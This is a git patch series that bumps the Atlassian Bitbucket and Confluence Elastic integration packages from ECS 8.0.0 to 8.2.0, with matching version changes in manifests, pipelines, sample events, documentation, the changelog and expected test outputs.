a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 4ffb59e12b1..336372f262b 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml 
@@ -6,7 +6,7 @@ processors:
 value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 - rename:
 field: message
 target_field: event.original
diff --git a/packages/atlassian_bitbucket/data_stream/audit/sample_event.json b/packages/atlassian_bitbucket/data_stream/audit/sample_event.json
index d9d20a7e98e..e8163536d90 100644
--- a/packages/atlassian_bitbucket/data_stream/audit/sample_event.json
+++ b/packages/atlassian_bitbucket/data_stream/audit/sample_event.json
@@ -38,7 +38,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/atlassian_bitbucket/docs/README.md b/packages/atlassian_bitbucket/docs/README.md
index 1a82efa02af..c682485ec02 100644
--- a/packages/atlassian_bitbucket/docs/README.md
+++ b/packages/atlassian_bitbucket/docs/README.md
@@ -138,7 +138,7 @@ An example event for `audit` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml
index 82132d43795..eb1f972a1d9 100644
--- a/packages/atlassian_bitbucket/manifest.yml
+++ b/packages/atlassian_bitbucket/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: atlassian_bitbucket
 title: Atlassian Bitbucket
-version: 1.1.0
+version: 1.2.0
 license: basic
 description: Collect logs from Atlassian Bitbucket with Elastic Agent.
 type: integration
From 54c2b3badaf7b490bded145af8c34c0f8af28731 Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 12:18:34 -0600
Subject: [PATCH 04/23] Update atlassian_confluence to ECS 8.2
---
 .../atlassian_confluence/_dev/build/build.yml | 2 +-
 packages/atlassian_confluence/changelog.yml | 5 +
 .../pipeline/test-audit-api.log-expected.json | 364 +++++++++---------
 .../test-audit-files.log-expected.json | 128 +++---
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../data_stream/audit/sample_event.json | 2 +-
 packages/atlassian_confluence/docs/README.md | 2 +-
 packages/atlassian_confluence/manifest.yml | 2 +-
 8 files changed, 256 insertions(+), 251 deletions(-)
diff --git a/packages/atlassian_confluence/_dev/build/build.yml b/packages/atlassian_confluence/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/atlassian_confluence/_dev/build/build.yml
+++ b/packages/atlassian_confluence/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml
index 95ae0b2dc8c..f86bec1222c 100644
--- a/packages/atlassian_confluence/changelog.yml
+++ b/packages/atlassian_confluence/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.0"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
index 5417e402e36..a654fe9a7fa 100644
--- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
+++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
@@ -35,7 +35,7 @@ }, "@timestamp": "2021-11-23T00:44:36.398Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -118,7 +118,7 @@ }, "@timestamp": "2021-11-23T00:43:12.188Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -201,7 +201,7 @@ }, "@timestamp": "2021-11-23T00:41:45.280Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -284,7 +284,7 @@ }, "@timestamp": "2021-11-23T00:41:17.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -367,7 +367,7 @@ }, "@timestamp": "2021-11-23T00:41:16.741Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -450,7 +450,7 @@ }, "@timestamp": "2021-11-23T00:41:07.156Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -533,7 +533,7 @@ }, "@timestamp": "2021-11-23T00:41:06.871Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -616,7 +616,7 @@ }, "@timestamp": "2021-11-23T00:40:32.595Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -699,7 +699,7 @@ }, "@timestamp": "2021-11-23T00:40:32.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ }, "@timestamp": "2021-11-23T00:39:37.908Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -892,7 +892,7 @@ }, "@timestamp": "2021-11-23T00:39:37.904Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -992,7 +992,7 @@ }, "@timestamp": "2021-11-23T00:39:37.899Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1085,7 +1085,7 @@ }, "@timestamp": "2021-11-23T00:39:37.895Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1185,7 +1185,7 @@ }, "@timestamp": "2021-11-23T00:39:37.891Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -1285,7 +1285,7 @@ }, "@timestamp": "2021-11-23T00:39:37.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1385,7 +1385,7 @@ }, "@timestamp": "2021-11-23T00:39:37.882Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1478,7 +1478,7 @@ }, "@timestamp": "2021-11-23T00:39:37.877Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1578,7 +1578,7 @@ }, "@timestamp": "2021-11-23T00:39:37.872Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1678,7 +1678,7 @@ }, "@timestamp": "2021-11-23T00:39:37.868Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1778,7 +1778,7 @@ }, "@timestamp": "2021-11-23T00:39:37.862Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1871,7 +1871,7 @@ }, "@timestamp": "2021-11-23T00:39:37.858Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1971,7 +1971,7 @@ }, "@timestamp": "2021-11-23T00:39:37.853Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2071,7 +2071,7 @@ }, "@timestamp": "2021-11-23T00:39:37.848Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2171,7 +2171,7 @@ }, "@timestamp": "2021-11-23T00:39:37.841Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2264,7 +2264,7 @@ }, "@timestamp": "2021-11-23T00:39:37.832Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2364,7 +2364,7 @@ }, "@timestamp": "2021-11-23T00:39:37.821Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2464,7 +2464,7 @@ }, "@timestamp": "2021-11-23T00:39:37.811Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2564,7 +2564,7 @@ }, "@timestamp": "2021-11-23T00:39:37.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2657,7 +2657,7 @@ }, "@timestamp": "2021-11-23T00:39:37.785Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2757,7 +2757,7 @@ }, "@timestamp": "2021-11-23T00:39:37.777Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2857,7 +2857,7 @@ }, "@timestamp": "2021-11-23T00:39:37.770Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2957,7 +2957,7 @@ }, "@timestamp": "2021-11-23T00:39:37.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3050,7 +3050,7 @@ }, "@timestamp": "2021-11-23T00:39:37.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3150,7 +3150,7 @@ }, "@timestamp": "2021-11-23T00:39:37.744Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3250,7 +3250,7 @@ }, "@timestamp": "2021-11-23T00:39:37.728Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3350,7 +3350,7 @@ }, "@timestamp": "2021-11-23T00:39:37.713Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3443,7 +3443,7 @@ }, "@timestamp": "2021-11-23T00:39:37.705Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3543,7 +3543,7 @@ }, "@timestamp": "2021-11-23T00:39:37.688Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3643,7 +3643,7 @@ }, "@timestamp": "2021-11-23T00:39:37.675Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3743,7 +3743,7 @@ }, "@timestamp": "2021-11-23T00:39:37.668Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3836,7 +3836,7 @@ }, "@timestamp": "2021-11-23T00:39:37.654Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3936,7 +3936,7 @@ }, "@timestamp": "2021-11-23T00:39:37.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4036,7 +4036,7 @@ }, "@timestamp": "2021-11-23T00:39:37.639Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4136,7 +4136,7 @@ }, "@timestamp": "2021-11-23T00:39:37.634Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4236,7 +4236,7 @@ }, "@timestamp": "2021-11-23T00:39:37.628Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4336,7 +4336,7 @@ }, "@timestamp": "2021-11-23T00:39:37.618Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4429,7 +4429,7 @@ }, "@timestamp": "2021-11-23T00:39:37.612Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4529,7 +4529,7 @@ }, "@timestamp": "2021-11-23T00:39:37.606Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4629,7 +4629,7 @@ }, "@timestamp": "2021-11-23T00:39:37.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4729,7 +4729,7 @@ }, "@timestamp": "2021-11-23T00:39:37.592Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4822,7 +4822,7 @@ }, "@timestamp": "2021-11-23T00:39:37.588Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4922,7 +4922,7 @@ }, "@timestamp": "2021-11-23T00:39:37.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5022,7 +5022,7 @@ }, "@timestamp": "2021-11-23T00:39:37.580Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -5122,7 +5122,7 @@ }, "@timestamp": "2021-11-23T00:39:37.575Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5215,7 +5215,7 @@ }, "@timestamp": "2021-11-23T00:39:37.571Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5315,7 +5315,7 @@ }, "@timestamp": "2021-11-23T00:39:37.567Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5415,7 +5415,7 @@ }, "@timestamp": "2021-11-23T00:39:37.556Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5515,7 +5515,7 @@ }, "@timestamp": "2021-11-23T00:39:37.454Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5608,7 +5608,7 @@ }, "@timestamp": "2021-11-23T00:39:37.444Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5708,7 +5708,7 @@ }, "@timestamp": "2021-11-23T00:39:37.435Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5808,7 +5808,7 @@ }, "@timestamp": "2021-11-23T00:39:37.424Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5908,7 +5908,7 @@ }, "@timestamp": "2021-11-23T00:39:37.404Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6003,7 +6003,7 @@ }, "@timestamp": "2021-11-23T00:39:37.393Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6091,7 +6091,7 @@ }, "@timestamp": "2021-11-23T00:39:37.375Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6179,7 +6179,7 @@ }, "@timestamp": "2021-11-23T00:39:37.366Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6267,7 +6267,7 @@ }, "@timestamp": "2021-11-23T00:39:37.361Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -6355,7 +6355,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.357Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6443,7 +6443,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.350Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6531,7 +6531,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.342Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6612,7 +6612,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.330Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6700,7 +6700,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.324Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6788,7 +6788,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.311Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6876,7 +6876,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.303Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -6964,7 +6964,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.295Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7052,7 +7052,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.290Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7133,7 +7133,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.285Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7221,7 +7221,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.282Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7309,7 +7309,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.278Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7397,7 +7397,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.274Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7478,7 +7478,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.270Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7566,7 +7566,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.266Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7654,7 +7654,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.262Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7742,7 +7742,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.258Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7823,7 +7823,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.254Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7911,7 +7911,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.250Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -7999,7 +7999,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.246Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8087,7 +8087,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.242Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8168,7 +8168,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.238Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8256,7 +8256,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.234Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8344,7 +8344,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.230Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8432,7 +8432,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.225Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8513,7 +8513,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.221Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8601,7 +8601,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.217Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8689,7 +8689,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.212Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8777,7 +8777,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.208Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8858,7 +8858,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.204Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -8946,7 +8946,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.200Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9034,7 +9034,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.194Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9122,7 +9122,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.188Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9203,7 +9203,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.176Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9284,7 +9284,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.166Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9372,7 +9372,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.160Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9460,7 +9460,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.155Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9548,7 +9548,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.149Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9629,7 +9629,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.143Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9717,7 +9717,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.137Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9805,7 +9805,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.132Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9893,7 +9893,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.128Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -9981,7 +9981,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.122Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10069,7 +10069,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.115Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10150,7 +10150,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.107Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10238,7 +10238,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.099Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10326,7 +10326,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.091Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10414,7 +10414,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.055Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10495,7 +10495,7 @@
 },
 "@timestamp": "2021-11-23T00:39:37.008Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10596,7 +10596,7 @@
 },
 "@timestamp": "2021-11-23T00:39:36.900Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10671,7 +10671,7 @@
 },
 "@timestamp": "2021-11-23T00:39:36.323Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10755,7 +10755,7 @@
 },
 "@timestamp": "2021-11-23T00:39:11.067Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10839,7 +10839,7 @@
 },
 "@timestamp": "2021-11-23T00:38:58.965Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -10923,7 +10923,7 @@
 },
 "@timestamp": "2021-11-23T00:38:57.393Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -11007,7 +11007,7 @@
 },
 "@timestamp": "2021-11-23T00:38:42.240Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -11091,7 +11091,7 @@
 },
 "@timestamp": "2021-11-23T00:38:35.211Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -11160,7 +11160,7 @@
 }
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11236,7 +11236,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.306Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11332,7 +11332,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.305Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11421,7 +11421,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.303Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11517,7 +11517,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.301Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11613,7 +11613,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.299Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11702,7 +11702,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.298Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11798,7 +11798,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.296Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11894,7 +11894,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.294Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11983,7 +11983,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.292Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12079,7 +12079,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.290Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12175,7 +12175,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.288Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12264,7 +12264,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.287Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12360,7 +12360,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.285Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12456,7 +12456,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.283Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12545,7 +12545,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.281Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12641,7 +12641,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.279Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12737,7 +12737,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.277Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12826,7 +12826,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.275Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12922,7 +12922,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.273Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13018,7 +13018,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.271Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
